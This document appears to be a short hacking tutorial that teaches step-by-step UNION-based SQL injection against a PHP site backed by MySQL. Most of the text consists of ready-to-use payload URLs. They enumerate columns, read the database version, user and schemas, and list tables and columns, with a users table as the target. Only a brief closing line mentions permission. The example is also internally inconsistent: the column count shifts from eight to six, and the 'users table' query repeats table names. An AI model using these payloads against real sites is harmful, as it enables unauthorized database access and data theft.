Initiating SQL Attack

One of the first steps you can take to uncover information about a vulnerable site to learn the structure of the database. To do this you can append a simple order by statement to the URL like so:

http://www.somesite.com/default.php?id=1 order by 1

 

if this code returns any result other than an error, then increment the number after the order by statement by 1 (or some other amount if desired) until an error is returned. When an error is encountered, it indicates that the last entry that did not return an error is the number of columns in the database.

Once the columns have been determined, you can establish whether you can make queries against the system. Do so by performing a union select on the system by appending it to the end of the URL:

http://www.somesite.com/default.php?id=-1 union select 1,2,3,4,5,6,7,8

 

Take a close look at this statement. This statement assumes that you discovered that there were eight columns in the database in your previous step. If more or fewer were encountered, you would adjust the numbers after the select accordingly. Also note that you add a hyphen after the = sign and before the number 1 (after the id).

Once the results of this query are returned, you will see that column numbers are returned. The numbers that are returned indicate that queries are accepted against these columns, and you can now inject further refined SQL statements into each.

You can now start doing some interesting tasks. Let’s begin by identifying the SQL version that is in use. To do this, you will use the command @@version or version() to extract the version information from the database. You will target one of the columns that accepts SQL queries.

http://www.somesite.com/default.php?id=-1 union select 1,2,@@version,4,5,6

 

The version information returned will replace the @@version. Depending on the database version being returned, you can determine the next stage of the attack. In our example, let’s assume the version returned is correct for our next step.

 

NOTE:- This example assumes that the database in use in MySQL and that the version is at least version 5. If another version or brand of database is in use, then be sure to tailor the attack to that environment.

 

With the version information checking out, you can do something even more interesting. You can obtain a list of the database present on the system by executing the following command:

 

http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(schema_name),4,5,6 from information_schema.schemata—

 

To determine the current database:

http://www.somesite.com/default.php?id=-1 union select 1,2,concat(database()),4,5,6—

 

To get the current user:

http://www.somesite.com/default.php?id=-1 union select 1,2,concat(user()),4,5,6—

 

To get the tables:

http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()—

 

With the tables presented, you will target the users table:

http://www.somesite.com/default.php?id=-1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.columns where table_schema=database()—

 

You can follow up those all given commands in your desired vulnerable websites so you can learn the practical work too and we don’t provide you any website to try on it. You must have the proper permission from that person so you can apply those SQL injection commands. And bring the site weaknesses to the webmaster of that piece of the websites.

Add a Comment